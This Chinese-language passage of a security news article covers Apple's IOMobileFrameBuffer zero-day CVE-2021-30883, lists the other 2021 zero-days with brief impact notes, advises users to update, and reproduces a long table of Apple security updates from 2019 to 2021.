CVE-2021-30883 也是继 Apple 在 2021 年 7 月解决了类似的匿名报告的内存损坏问题 (CVE-2021-30807) 之后,第二个影响 IOMobileFrameBuffer 的零日漏洞,这增加了这两个缺陷可能相关的可能性。通过最新的修复,该公司仅在 2021 年就解决了创纪录的 17 个零日问题——
- CVE-2021-1782(内核)- 恶意应用程序可能能够提升权限
- CVE-2021-1870 (WebKit) – 远程攻击者可能会导致任意代码执行
- CVE-2021-1871 (WebKit) – 远程攻击者可能会导致任意代码执行
- CVE-2021-1879 (WebKit) – 处理恶意制作的 Web 内容可能导致通用跨站点脚本
- CVE-2021-30657(系统首选项)- 恶意应用程序可能会绕过 Gatekeeper 检查
- CVE-2021-30661(WebKit 存储) – 处理恶意制作的 Web 内容可能会导致任意代码执行
- CVE-2021-30663 (WebKit) – 处理恶意制作的 Web 内容可能会导致任意代码执行
- CVE-2021-30665 (WebKit) – 处理恶意制作的 Web 内容可能会导致任意代码执行
- CVE-2021-30666 (WebKit) – 处理恶意制作的 Web 内容可能会导致任意代码执行
- CVE-2021-30713(TCC 框架)- 恶意应用程序可能能够绕过隐私首选项
- CVE-2021-30761 (WebKit) – 处理恶意制作的 Web 内容可能会导致任意代码执行
- CVE-2021-30762 (WebKit) – 处理恶意制作的 Web 内容可能会导致任意代码执行
- CVE-2021-30807 (IOMobileFrameBuffer) – 应用程序可能能够以内核权限执行任意代码
- CVE-2021-30858 (WebKit) – 处理恶意制作的 Web 内容可能会导致任意代码执行
- CVE-2021-30860 (CoreGraphics) – 处理恶意制作的 PDF 可能会导致任意代码执行
- CVE-2021-30869 (XNU) – 恶意应用程序可能能够以内核权限执行任意代码
强烈建议苹果 iPhone 和 iPad 用户更新到最新版本(iOS 15.0.2 和 iPad 15.0.2)以缓解安全漏洞。
Apple 安全性更新列表
| 名称和信息链接 | 适用于 | 发布日期 |
|---|---|---|
| iOS 15.0.1 和 iPadOS 15.0.1 这个更新没有已发布的 CVE 条目。 | iPhone 6s 及更新机型、iPad Pro(所有机型)、iPad Air 2 及更新机型、iPad(第 5 代)及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代) | 2021 年 10 月 1 日 |
| 安全性更新 2021-006 Catalina | macOS Catalina | 2021 年 9 月 23 日 |
| iOS 12.5.5 | iPhone 5s、iPhone 6、iPhone 6 Plus、iPad Air、iPad mini 2、iPad mini 3 和 iPod touch(第 6 代) | 2021 年 9 月 23 日 |
| Windows 版 iTunes 12.12 | Windows 10 及更高版本 | 2021 年 9 月 20 日 |
| Safari 浏览器 15 | macOS Big Sur 和 macOS Catalina | 2021 年 9 月 20 日 |
| Xcode 13 | macOS Big Sur 11.3 及更高版本 | 2021 年 9 月 20 日 |
| Apple tvOS 15 | Apple TV 4K 和 Apple TV HD | 2021 年 9 月 20 日 |
| watchOS 8 | Apple Watch Series 3 及更新机型 | 2021 年 9 月 20 日 |
| iOS 15 和 iPadOS 15 | iPhone 6s 及更新机型、iPad Pro(所有机型)、iPad Air 2 及更新机型、iPad(第 5 代)及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代) | 2021 年 9 月 20 日 |
| iTunes U 3.8.3 | iOS 12.4 及更高版本或 iPadOS 12.4 及更高版本 | 2021 年 9 月 15 日 |
| Safari 浏览器 14.1.2 | macOS Catalina 和 macOS Mojave | 2021 年 9 月 13 日 |
| 安全性更新 2021-005 Catalina | macOS Catalina | 2021 年 9 月 13 日 |
| macOS Big Sur 11.6 | macOS Big Sur | 2021 年 9 月 13 日 |
| watchOS 7.6.2 | Apple Watch Series 3 及更新机型 | 2021 年 9 月 13 日 |
| iOS 14.8 和 iPadOS 14.8 | iPhone 6s 及更新机型、iPad Pro(所有机型)、iPad Air 2 及更新机型、iPad(第 5 代)及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代) | 2021 年 9 月 13 日 |
| Windows 版 iCloud 12.5 | Windows 10 及更高版本,通过 Microsoft Store 获取 | 2021 年 8 月 16 日 |
| macOS Big Sur 11.5.2 这个更新没有已发布的 CVE 条目。 | macOS Big Sur | 2021 年 8 月 11 日 |
| Windows 版 iTunes 12.11.4 | Windows 10 及更高版本 | 2021 年 8 月 9 日 |
| watchOS 7.6.1 | Apple Watch Series 3 及更新机型 | 2021 年 7 月 29 日 |
| iOS 14.7.1 和 iPadOS 14.7.1 | iPhone 6s 及更新机型、iPad Pro(所有机型)、iPad Air 2 及更新机型、iPad(第 5 代)及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代) | 2021 年 7 月 26 日 |
| macOS Big Sur 11.5.1 | macOS Big Sur | 2021 年 7 月 26 日 |
| macOS Big Sur 11.5 | macOS Big Sur | 2021 年 7 月 21 日 |
| 安全性更新 2021-004 Catalina | macOS Catalina | 2021 年 7 月 21 日 |
| 安全性更新 2021-005 Mojave | macOS Mojave | 2021 年 7 月 21 日 |
| iPadOS 14.7 | iPad Pro(所有机型)、iPad Air 2 及更新机型、iPad(第 5 代)及更新机型,以及 iPad mini 4 及更新机型 | 2021 年 7 月 21 日 |
| Safari 浏览器 14.1.2 | macOS Catalina 和 macOS Mojave | 2021 年 7 月 19 日 |
| iOS 14.7 | iPhone 6s 及更新机型和 iPod touch(第 7 代) | 2021 年 7 月 19 日 |
| watchOS 7.6 | Apple Watch Series 3 及更新机型 | 2021 年 7 月 19 日 |
| Apple tvOS 14.7 | Apple TV 4K 和 Apple TV HD | 2021 年 7 月 19 日 |
| iMovie 剪辑 10.2.4 | macOS Catalina 10.15.6 及更高版本 | 2021 年 6 月 17 日 |
| iOS 12.5.4 | iPhone 5s、iPhone 6、iPhone 6 Plus、iPad Air、iPad mini 2、iPad mini 3 和 iPod touch(第 6 代) | 2021 年 6 月 14 日 |
| Safari 浏览器 14.1.1 | macOS Catalina 和 macOS Mojave | 2021 年 5 月 24 日 |
| 安全性更新 2021-003 Catalina | macOS Catalina | 2021 年 5 月 24 日 |
| 安全性更新 2021-004 Mojave | macOS Mojave | 2021 年 5 月 24 日 |
| macOS Big Sur 11.4 | macOS Big Sur | 2021 年 5 月 24 日 |
| iOS 14.6 和 iPadOS 14.6 | iPhone 6s 及更新机型、iPad Pro(所有机型)、iPad Air 2 及更新机型、iPad(第 5 代)及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代) | 2021 年 5 月 24 日 |
| Apple tvOS 14.6 | Apple TV 4K 和 Apple TV HD | 2021 年 5 月 24 日 |
| watchOS 7.5 | Apple Watch Series 3 及更新机型 | 2021 年 5 月 24 日 |
| 启动转换 6.1.14 | Mac Pro(2013 年末及更新机型)、MacBook Pro(2013 年末及更新机型)、MacBook Air(2013 年中及更新机型)、Mac mini(2014 年中及更新机型)、iMac(2014 年中及更新机型)、MacBook(2015 年初及更新机型)、iMac Pro(2017 年末) | 2021 年 5 月 17 日 |
| Safari 浏览器 14.1 | macOS Catalina 和 macOS Mojave | 2021 年 5 月 4 日 |
| macOS Big Sur 11.3.1 | macOS Big Sur | 2021 年 5 月 3 日 |
| iOS 14.5.1 和 iPadOS 14.5.1 | iPhone 6s 及更新机型、iPad Pro(所有机型)、iPad Air 2 及更新机型、iPad(第 5 代)及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代) | 2021 年 5 月 3 日 |
| iOS 12.5.3 | iPhone 5s、iPhone 6、iPhone 6 Plus、iPad Air、iPad mini 2、iPad mini 3 和 iPod touch(第 6 代) | 2021 年 5 月 3 日 |
| watchOS 7.4.1 | Apple Watch Series 3 及更新机型 | 2021 年 5 月 3 日 |
| Windows 版 iCloud 12.3 | Windows 10 及更高版本,通过 Microsoft Store 获取 | 2021 年 4 月 26 日 |
| Xcode 12.5 | macOS Big Sur 11 及更高版本 | 2021 年 4 月 26 日 |
| Safari 浏览器 14.1 | macOS Catalina 和 macOS Mojave | 2021 年 4 月 26 日 |
| macOS Big Sur 11.3 | macOS Big Sur | 2021 年 4 月 26 日 |
| 安全性更新 2021-002 Catalina | macOS Catalina | 2021 年 4 月 26 日 |
| 安全性更新 2021-003 Mojave | macOS Mojave | 2021 年 4 月 26 日 |
| iOS 14.5 和 iPadOS 14.5 | iPhone 6s 及更新机型、iPad Pro(所有机型)、iPad Air 2 及更新机型、iPad(第 5 代)及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代) | 2021 年 4 月 26 日 |
| watchOS 7.4 | Apple Watch Series 3 及更新机型 | 2021 年 4 月 26 日 |
| Apple tvOS 14.5 | Apple TV 4K 和 Apple TV HD | 2021 年 4 月 26 日 |
| Windows 版 iTunes 12.11.3 | Windows 10 及更高版本 | 2021 年 4 月 22 日 |
| 库乐队 10.4.3 | macOS Big Sur | 2021 年 4 月 6 日 |
| iOS 14.4.2 和 iPadOS 14.4.2 | iPhone 6s 及更新机型、iPad Pro(所有机型)、iPad Air 2 及更新机型、iPad(第 5 代)及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代) | 2021 年 3 月 26 日 |
| iOS 12.5.2 | iPhone 5s、iPhone 6、iPhone 6 Plus、iPad Air、iPad mini 2、iPad mini 3 和 iPod touch(第 6 代) | 2021 年 3 月 26 日 |
| watchOS 7.3.3 | Apple Watch Series 3 及更新机型 | 2021 年 3 月 26 日 |
| Safari 浏览器 14.0.3(版本 14610.4.3.1.7 和 15610.4.3.1.7) | macOS Catalina 和 macOS Mojave | 2021 年 3 月 8 日 |
| macOS Big Sur 11.2.3 | macOS Big Sur | 2021 年 3 月 8 日 |
| watchOS 7.3.2 | Apple Watch Series 3 及更新机型 | 2021 年 3 月 8 日 |
| iOS 14.4.1 和 iPadOS 14.4.1 | iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代) | 2021 年 3 月 8 日 |
| macOS Big Sur 11.2.2 这个更新没有已发布的 CVE 条目。 | macOS Big Sur 11.2.1 | 2021 年 2 月 25 日 |
| watchOS 7.3.1 这个更新没有已发布的 CVE 条目。 | Apple Watch Series 5 和 Apple Watch SE | 2021 年 2 月 15 日 |
| macOS Big Sur 11.2.1、macOS Catalina 10.15.7 补充更新、macOS Mojave 10.14.6 安全性更新 2021-002 | macOS Big Sur 11.2、macOS Catalina 10.15.7 和 macOS Mojave 10.14.6 | 2021 年 2 月 9 日 |
| Safari 浏览器 14.0.3 | macOS Catalina 和 macOS Mojave | 2021 年 2 月 1 日 |
| macOS Big Sur 11.2、安全性更新 2021-001 Catalina、安全性更新 2021-001 Mojave | macOS Big Sur 11.0.1、macOS Catalina 10.15.7 和 macOS Mojave 10.14.6 | 2021 年 2 月 1 日 |
| Xcode 12.4 | macOS Catalina 10.15.4 及更高版本 | 2021 年 1 月 26 日 |
| Windows 版 iCloud 12.0 | Windows 10 及更高版本,通过 Microsoft Store 获取 | 2021 年 1 月 26 日 |
| iOS 14.4 和 iPadOS 14.4 | iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代) | 2021 年 1 月 26 日 |
| Apple tvOS 14.4 | Apple TV 4K 和 Apple TV HD | 2021 年 1 月 26 日 |
| watchOS 7.3 | Apple Watch Series 3 及更新机型 | 2021 年 1 月 26 日 |
| iOS 12.5.1 这个更新没有已发布的 CVE 条目。 | iPhone 5s、iPhone 6、iPhone 6 Plus、iPad Air、iPad mini 2、iPad mini 3 和 iPod touch(第 6 代) | 2021 年 1 月 11 日 |
| iOS 14.3 和 iPadOS 14.3 | iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代) | 2020 年 12 月 14 日 |
| macOS Big Sur 11.1、安全性更新 2020-001 Catalina、安全性更新 2020-007 Mojave | macOS Big Sur 11.0.1、macOS Catalina 10.15.7 和 macOS Mojave 10.14.6 | 2020 年 12 月 14 日 |
| macOS 服务器 5.11 | macOS Big Sur | 2020 年 12 月 14 日 |
| Apple tvOS 14.3 | Apple TV 4K 和 Apple TV HD | 2020 年 12 月 14 日 |
| watchOS 7.2 | Apple Watch Series 3 及更新机型 | 2020 年 12 月 14 日 |
| Safari 浏览器 14.0.2 | macOS Catalina 和 macOS Mojave | 2020 年 12 月 14 日 |
| iOS 12.5 | iPhone 5s、iPhone 6、iPhone 6 Plus、iPad Air、iPad mini 2、iPad mini 3 和 iPod touch(第 6 代) | 2020 年 12 月 14 日 |
| watchOS 6.3 | Apple Watch Series 1 和 Apple Watch Series 2 | 2020 年 12 月 14 日 |
| Windows 版 iCloud 11.5 | Windows 10 及更高版本,通过 Microsoft Store 获取 | 2020 年 12 月 2 日 |
| iOS 14.2.1 这个更新没有已发布的 CVE 条目。 | iPhone 12 Pro、iPhone 12 Pro Max、iPhone 12 和 iPhone 12 mini | 2020 年 11 月 19 日 |
| macOS Big Sur 11.0.1 | Mac mini(M1,2020 年)、MacBook Air(M1,2020 年)、MacBook Air(13 英寸,2020 年) | 2020 年 11 月 17 日 |
| Windows 版 iTunes 12.11 | Windows 10 及更高版本 | 2020 年 11 月 17 日 |
| Safari 浏览器 14.0.1 | macOS Catalina 和 macOS Mojave | 2020 年 11 月 12 日 |
| 安全性更新 2020-006 High Sierra、安全性更新 2020-006 Mojave | macOS High Sierra 10.13.6、macOS Mojave 10.14.6 | 2020 年 11 月 12 日 |
| macOS Big Sur 11.0.1(“使用忠告”中包含 macOS Big Sur 11.0 和 macOS Big Sur 11.0.1 的安全性内容) | Mac Pro(2013 年及更新机型)、MacBook Air(2013 年及更新机型)、MacBook Pro(2013 年末及更新机型)、Mac mini(2014 年及更新机型)、iMac(2014 年及更新机型)、MacBook(2015 年及更新机型)、iMac Pro(所有机型) | 2020 年 11 月 12 日 |
| macOS Big Sur 11.0 | 只有某些 Mac 机型会预先安装;请更新到 macOS Big Sur 11.0.1 | 预先安装 |
| Fire OS 版 Apple TV App | Apple TV 5.1 及更新机型 | 2020 年 11 月 9 日 |
| watchOS 7.1 | Apple Watch Series 3 及更新机型 | 2020 年 11 月 5 日 |
| watchOS 6.2.9 | Apple Watch Series 1 和 Apple Watch Series 2 | 2020 年 11 月 5 日 |
| watchOS 5.3.9 | Apple Watch Series 1 及更新机型 | 2020 年 11 月 5 日 |
| macOS Catalina 10.15.7 补充更新、macOS Catalina 10.15.7 更新 | macOS Catalina 10.15.7 | 2020 年 11 月 5 日 |
| Apple tvOS 14.2 | Apple TV 4K 和 Apple TV HD | 2020 年 11 月 5 日 |
| iOS 14.2 和 iPadOS 14.2 | iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代) | 2020 年 11 月 5 日 |
| iOS 12.4.9 | iPhone 5s、iPhone 6 和 6 Plus、iPad Air、iPad mini 2 和 3、iPod touch(第 6 代) | 2020 年 11 月 5 日 |
| 安卓版 Apple Music 3.4.0 | 安卓版本 5.0 及更高版本 | 2020 年 10 月 26 日 |
| iOS 14.1 和 iPadOS 14.1 这个更新没有已发布的 CVE 条目。 | iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代) | 2020 年 10 月 20 日 |
| watchOS 7.0.3 这个更新没有已发布的 CVE 条目。 | Apple Watch Series 3 | 2020 年 10 月 19 日 |
| watchOS 7.0.2 这个更新没有已发布的 CVE 条目。 | Apple Watch Series 3 及更新机型 | 2020 年 10 月 12 日 |
| Apple tvOS 14.0.2 这个更新没有已发布的 CVE 条目。 | Apple TV 4K 和 Apple TV HD | 2020 年 10 月 5 日 |
| macOS 10.14.6 补充更新 | macOS Mojave | 2020 年 10 月 1 日 |
| Windows 版 iCloud 7.21 | Windows 7 及更高版本 | 2020 年 9 月 24 日 |
| Windows 版 iCloud 11.4 | Windows 10 及更高版本,通过 Microsoft Store 获取 | 2020 年 9 月 24 日 |
| macOS Catalina 10.15.7、安全性更新 2020-005 High Sierra、安全性更新 2020-005 Mojave | macOS High Sierra 10.13.6、macOS Mojave 10.14.6、macOS Catalina 10.15.6 | 2020 年 9 月 24 日 |
| iOS 14.0.1 和 iPadOS 14.0.1 这个更新没有已发布的 CVE 条目。 | iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代) | 2020 年 9 月 24 日 |
| watchOS 7.0.1 这个更新没有已发布的 CVE 条目。 | Apple Watch Series 3 及更新机型 | 2020 年 9 月 24 日 |
| Apple tvOS 14.0.1 这个更新没有已发布的 CVE 条目。 | Apple TV 4K 和 Apple TV HD | 2020 年 9 月 24 日 |
| Safari 浏览器 14.0 | macOS Catalina 和 macOS Mojave | 2020 年 9 月 16 日 |
| Apple tvOS 14.0 | Apple TV 4K 和 Apple TV HD | 2020 年 9 月 16 日 |
| watchOS 7.0 | Apple Watch Series 3 及更新机型 | 2020 年 9 月 16 日 |
| iOS 14.0 和 iPadOS 14.0 | iPhone 6s 及更新机型、iPod touch 第 7 代、iPad Air 2 及更新机型和 iPad mini 4 及更新机型 | 2020 年 9 月 16 日 |
| Windows 版 iTunes 12.10.9 | Windows 7 及更高版本 | 2020 年 9 月 16 日 |
| Xcode 12.0 | macOS Catalina 10.15.4 及更高版本 | 2020 年 9 月 16 日 |
| iOS 13.7 这个更新没有已发布的 CVE 条目。 | iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代 | 2020 年 9 月 1 日 |
| iOS 13.6.1 这个更新没有已发布的 CVE 条目。 | iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代 | 2020 年 8 月 12 日 |
| macOS Catalina 10.15.6 补充更新 这个更新没有已发布的 CVE 条目。 | macOS Catalina 10.15.6 | 2020 年 8 月 12 日 |
| Windows 版 iCloud 11.3 | Windows 10 及更高版本,通过 Microsoft Store 获取 | 2020 年 8 月 10 日 |
| Windows 版 iCloud 7.20 | Windows 7 及更高版本 | 2020 年 8 月 10 日 |
| Windows 版 iTunes 12.10.8 | Windows 7 及更高版本 | 2020 年 7 月 30 日 |
| Safari 浏览器 13.1.2 | macOS Mojave 和 macOS High Sierra,随附于 macOS Catalina 中 | 2020 年 7 月 15 日 |
| iOS 12.4.8 这个更新没有已发布的 CVE 条目。 | iPhone 5s、iPhone 6 和 6 Plus、iPad Air、iPad mini 2 和 3、iPod touch(第 6 代) | 2020 年 7 月 15 日 |
| watchOS 5.3.8 这个更新没有已发布的 CVE 条目。 | Apple Watch Series 1、2、3 和 4 | 2020 年 7 月 15 日 |
| Xcode 11.6 这个更新没有已发布的 CVE 条目。 | macOS Mojave 10.15.2 及更高版本 | 2020 年 7 月 15 日 |
| iOS 13.6 和 iPadOS 13.6 | iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代 | 2020 年 7 月 15 日 |
| Apple tvOS 13.4.8 | Apple TV 4K 和 Apple TV HD | 2020 年 7 月 15 日 |
| watchOS 6.2.8 | Apple Watch Series 1 及更新机型 | 2020 年 7 月 15 日 |
| macOS Catalina 10.15.6、安全性更新 2020-004 Mojave、安全性更新 2020-004 High Sierra | macOS High Sierra 10.13.6、macOS Mojave 10.14.6、macOS Catalina 10.15.5 | 2020 年 7 月 15 日 |
| macOS Catalina 10.15.5 补充更新、安全性更新 2020-003 High Sierra | macOS High Sierra 10.13.6、macOS Catalina 10.15.5 | 2020 年 6 月 1 日 |
| Apple tvOS 13.4.6 | Apple TV 4K 和 Apple TV HD | 2020 年 6 月 1 日 |
| watchOS 6.2.6 | Apple Watch Series 1 及更新机型 | 2020 年 6 月 1 日 |
| iOS 13.5.1 和 iPadOS 13.5.1 | iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代 | 2020 年 6 月 1 日 |
| macOS Catalina 10.15.5、安全性更新 2020-003 Mojave、安全性更新 2020-003 High Sierra | macOS High Sierra 10.13.6、macOS Mojave 10.14.6、macOS Catalina 10.15.4 | 2020 年 5 月 26 日 |
| Windows 迁移助理 2.2.0.0 (v. 1A11) | macOS Catalina | 2020 年 5 月 26 日 |
| Safari 浏览器 13.1.1 | macOS Mojave 和 macOS High Sierra,随附于 macOS Catalina 中 | 2020 年 5 月 26 日 |
| Windows 版 iCloud 11.2 | Windows 10 及更高版本,通过 Microsoft Store 获取 | 2020 年 5 月 26 日 |
| Windows 版 iCloud 7.19 | Windows 7 及更高版本 | 2020 年 5 月 26 日 |
| Windows 版 iTunes 12.10.7 | Windows 7 及更高版本 | 2020 年 5 月 21 日 |
| iOS 13.5 和 iPadOS 13.5 | iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代 | 2020 年 5 月 20 日 |
| iOS 12.4.7 | iPhone 5s、iPhone 6、iPhone 6 Plus、iPad Air、iPad mini 2、iPad mini 3 和 iPod touch 第 6 代 | 2020 年 5 月 20 日 |
| Apple tvOS 13.4.5 | Apple TV 4K 和 Apple TV HD | 2020 年 5 月 20 日 |
| Xcode 11.5 | macOS Catalina 10.15.2 及更高版本 | 2020 年 5 月 20 日 |
| watchOS 5.3.7 | Apple Watch Series 1、Apple Watch Series 2、Apple Watch Series 3 和 Apple Watch Series 4(在已与装有 iOS 12 的 iPhone 配对的情况下) | 2020 年 5 月 18 日 |
| watchOS 6.2.5 | Apple Watch Series 1 及更新机型 | 2020 年 5 月 18 日 |
| iOS 13.4.1 这个更新没有已发布的 CVE 条目。 | iPhone SE(第 2 代) | 2020 年 4 月 23 日 |
| watchOS 6.2.1 这个更新没有已发布的 CVE 条目。 | Apple Watch Series 1 和 2 Apple Watch Series 3 及更新机型 | 2020 年 4 月 20 日 2020 年 4 月 8 日 |
| Xcode 11.4.1 | macOS Catalina 10.15.2 及更高版本 | 2020 年 4 月 15 日 |
| macOS Catalina 10.15.4 补充更新 这个更新没有已发布的 CVE 条目。 | macOS Catalina 10.15.4 | 2020 年 4 月 8 日 |
| iOS 13.4.1 和 iPadOS 13.4.1 这个更新没有已发布的 CVE 条目。 | iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代 | 2020 年 4 月 7 日 |
| Windows 版 iCloud 7.18 | Windows 7 及更高版本 | 2020 年 3 月 25 日 |
| Windows 版 iCloud 10.9.3 | Windows 10 及更高版本,通过 Microsoft Store 获取 | 2020 年 3 月 25 日 |
| Windows 版 iTunes 12.10.5 | Windows 7 及更高版本 | 2020 年 3 月 24 日 |
| iOS 13.4 和 iPadOS 13.4 | iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代 | 2020 年 3 月 24 日 |
| watchOS 5.3.6 这个更新没有已发布的 CVE 条目。 | Apple Watch Series 1、Apple Watch Series 2、Apple Watch Series 3 和 Apple Watch Series 4(在已与装有 iOS 12 的 iPhone 配对的情况下) | 2020 年 3 月 24 日 |
| iOS 12.4.6 这个更新没有已发布的 CVE 条目。 | iPhone 5s、iPhone 6、iPhone 6 Plus、iPad Air、iPad mini 2、iPad mini 3 和 iPod touch 第 6 代 | 2020 年 3 月 24 日 |
| Safari 浏览器 13.1 | macOS Mojave 和 macOS High Sierra,随附于 macOS Catalina 中 | 2020 年 3 月 24 日 |
| watchOS 6.2 | Apple Watch Series 1 及更新机型 | 2020 年 3 月 24 日 |
| Apple tvOS 13.4 | Apple TV 4K 和 Apple TV HD | 2020 年 3 月 24 日 |
| macOS Catalina 10.15.4、安全性更新 2020-002 Mojave、安全性更新 2020-002 High Sierra | macOS High Sierra 10.13.6、macOS Mojave 10.14.6、macOS Catalina 10.15.3 | 2020 年 3 月 24 日 |
| Xcode 11.4 | macOS Catalina 10.15.2 及更高版本 | 2020 年 3 月 24 日 |
| watchOS 6.1.3 这个更新没有已发布的 CVE 条目。 | Apple Watch Series 1 及更新机型 | 2020 年 2 月 18 日 |
| watchOS 5.3.5 这个更新没有已发布的 CVE 条目。 | Apple Watch Series 1、Apple Watch Series 2、Apple Watch Series 3 和 Apple Watch Series 4(在已与装有 iOS 12 的 iPhone 配对的情况下) | 2020 年 2 月 18 日 |
| Windows 版 iCloud 10.9.2 | Windows 10 及更高版本,通过 Microsoft Store 获取 | 2020 年 1 月 29 日 |
| Windows 版 iTunes 12.10.4 | Windows 7 及更高版本 | 2020 年 1 月 28 日 |
| Apple tvOS 13.3.1 | Apple TV 4K 和 Apple TV HD | 2020 年 1 月 28 日 |
| Safari 浏览器 13.0.5 | macOS Mojave 和 macOS High Sierra,随附于 macOS Catalina 中 | 2020 年 1 月 28 日 |
| iOS 12.4.5 这个更新没有已发布的 CVE 条目。 | iPhone 5s、iPhone 6、iPhone 6 Plus、iPad Air、iPad mini 2、iPad mini 3 和 iPod touch 第 6 代 | 2020 年 1 月 28 日 |
| iOS 13.3.1 和 iPadOS 13.3.1 | iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代 | 2020 年 1 月 28 日 |
| Windows 版 iCloud 7.17 | Windows 7 及更高版本 | 2020 年 1 月 28 日 |
| watchOS 6.1.2 | Apple Watch Series 1 及更新机型 | 2020 年 1 月 28 日 |
| macOS Catalina 10.15.3、安全性更新 2020-001 Mojave、安全性更新 2020-001 High Sierra | macOS High Sierra 10.13.6、macOS Mojave 10.14.6 和 macOS Catalina 10.15.2 | 2020 年 1 月 28 日 |
| Windows 版 iCloud 10.9.1 这个更新没有已发布的 CVE 条目。 | Windows 10 及更高版本,通过 Microsoft Store 获取 | 2020 年 1 月 8 日 |
| Windows 版 iCloud 10.9 | Windows 10 及更高版本,通过 Microsoft Store 获取 | 2019 年 12 月 11 日 |
| Windows 版 iCloud 7.16 | Windows 7 及更高版本 | 2019 年 12 月 11 日 |
| Windows 版 iTunes 12.10.3 | Windows 7 及更高版本 | 2019 年 12 月 11 日 |
| Xcode 11.3 | macOS Mojave 10.14.4 及更高版本 | 2019 年 12 月 10 日 |
| watchOS 5.3.4 | Apple Watch Series 1、Apple Watch Series 2、Apple Watch Series 3 和 Apple Watch Series 4(在已与装有 iOS 12 的设备配对的情况下) | 2019 年 12 月 10 日 |
| watchOS 6.1.1 | Apple Watch Series 1 及更新机型 | 2019 年 12 月 10 日 |
| Apple tvOS 13.3 | Apple TV 4K 和 Apple TV HD | 2019 年 12 月 10 日 |
| macOS Catalina 10.15.2、安全性更新 2019-002 Mojave 和安全性更新 2019-007 High Sierra | macOS Catalina 10.15、macOS Mojave 10.14.6、macOS High Sierra 10.13.6 | 2019 年 12 月 10 日 |
| Safari 浏览器 13.0.4 | macOS Mojave 和 macOS High Sierra,随附于 macOS Catalina 中 | 2019 年 12 月 10 日 |
| iOS 12.4.4 | iPhone 5s、iPhone 6、iPhone 6 Plus、iPad Air、iPad mini 2、iPad mini 3 和 iPod touch 第 6 代 | 2019 年 12 月 10 日 |
| iOS 13.3 和 iPadOS 13.3 | iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代 | 2019 年 12 月 10 日 |
| iOS 13.2.3 和 iPadOS 13.2.3 这个更新没有已发布的 CVE 条目。 | iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代 | 2019 年 11 月 18 日 |
| iOS 13.2.2 和 iPadOS 13.2.2 这个更新没有已发布的 CVE 条目。 | iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代 | 2019 年 11 月 7 日 |
| Xcode 11.2 | macOS Mojave 10.14.4 及更高版本 | 2019 年 10 月 31 日 |
| Windows 版 iTunes 12.10.2 | Windows 7 及更高版本 | 2019 年 10 月 30 日 |
| Windows 版 iCloud 10.8 | Windows 10 及更高版本,通过 Microsoft Store 获取 | 2019 年 10 月 30 日 |
| Windows 版 iCloud 7.15 | Windows 7 及更高版本 | 2019 年 10 月 30 日 |
| macOS Catalina 10.15.1、安全性更新 2019-001 和安全性更新 2019-006 | macOS Catalina 10.15、macOS Mojave 10.14.6 和 macOS High Sierra 10.13.6 | 2019 年 10 月 29 日 |
| watchOS 5.3.3 这个更新没有已发布的 CVE 条目。 | Apple Watch Series 1、2、3 和 4 | 2019 年 10 月 29 日 |
| watchOS 6.1 | Apple Watch Series 1 及更新机型 | 2019 年 10 月 29 日 |
| Safari 浏览器 13.0.3 | macOS Mojave 10.14.6 和 macOS High Sierra 10.13.6 | 2019 年 10 月 28 日 |
| iOS 13.2 和 iPadOS 13.2 | iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代 | 2019 年 10 月 28 日 |
| iOS 12.4.3 | iPhone 5s、iPhone 6 和 6 Plus、iPad Air、iPad mini 2 和 3、iPod touch(第 6 代) | 2019 年 10 月 28 日 |
| Apple tvOS 13.2 | Apple TV 4K 和 Apple TV HD | 2019 年 10 月 28 日 |
| macOS Catalina 10.15 补充更新 这个更新没有已发布的 CVE 条目。 | MacBook(2015 年初及更新机型)、MacBook Air(2012 年中及更新机型)、MacBook Pro(2012 年中及更新机型)、Mac mini(2012 年末及更新机型)、iMac (2012 年末及更新机型)、iMac Pro(所有机型)和 Mac Pro(2013 年末及更新机型) | 2019 年 10 月 15 日 |
| iOS 13.1.3 和 iPadOS 13.1.3 这个更新没有已发布的 CVE 条目。 | iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代 | 2019 年 10 月 15 日 |
| Ubuntu 版 Swift 5.1.1 | Ubuntu 14.04、16.04 和 18.04 | 2019 年 10 月 11 日 |
| Windows 版 iTunes 12.10.1 | Windows 7 及更高版本 | 2019 年 10 月 7 日 |
